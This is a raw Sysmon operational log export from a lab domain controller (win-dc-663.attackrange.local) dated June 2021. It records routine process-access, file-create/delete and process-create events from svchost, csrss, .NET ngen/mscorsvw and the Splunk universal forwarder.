21:02:50.265{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0C03-00000000CF01}3860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17D-60D3-1403-00000000CF01}7124C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A17D-60D3-1403-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.875{4DB9351A-A17D-60D3-1403-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.952{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39EB25A67CBF7ABBC174223E485574F0,SHA256=ED560153AA04D7FD03AB2F66DBC2F5EF998241586AC6960EBEAB06F1E2A087A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.937{4DB9351A-A17F-60D3-1A03-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0FZ81IDWXL\System.Xml.Linq.ni.dll.auxMD5=61E8A8E3E699A8059F5FA65524029959,SHA256=95C52501934AA36E9D0AF3EA88BA021548E16D7033393C75EDBDD0583DD60CD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.937{4DB9351A-A17F-60D3-1A03-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0FZ81IDWXL\System.Xml.Linq.ni.dllMD5=AA90C6B3EA58C5485906FE122BC782CC,SHA256=65A337C5A67DA88E01B91068F0A6BD7AA15184B2C9E2F73D276B2D1307F0EC25,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:02:55.921{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a4c-0\System.Xml.Linq.dll2021-06-23 21:02:55.921 10341000x800000000000000019860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.642{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:55.702{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.687{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:55.687{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:55.538{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17F-60D3-1803-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.507{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1803-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:55.507{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17F-60D3-1803-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.444{4DB9351A-A17F-60D3-1703-00000000CF01}7100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\V7W2GH57A6\System.Net.Http.ni.dll.auxMD5=AC82C3BB4D68CD298ECB6826267CE6EE,SHA256=D1C3FCBA0E71F8909B7C33FB0ED4696908F0C0CD53E307E78C14648434CF462A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.429{4DB9351A-A17F-60D3-1703-00000000CF01}7100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\V7W2GH57A6\System.Net.Http.ni.dllMD5=D9A222040D5C3C5602CB1DBFEE5A9340,SHA256=228F92CA14A294CAE5048BB505B64902B720A36864A4161332D207622ACDE7CF,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:55.413{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bbc-0\System.Net.Http.dll2021-06-23 21:02:55.413 23542300x800000000000000019843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.397{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5179E9D164CA020A5BED5DA62C133C96,SHA256=58BB6C0BCEAED302F0E58262758F37100CED590F6F10D003DF8E17ECDD2B3A27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
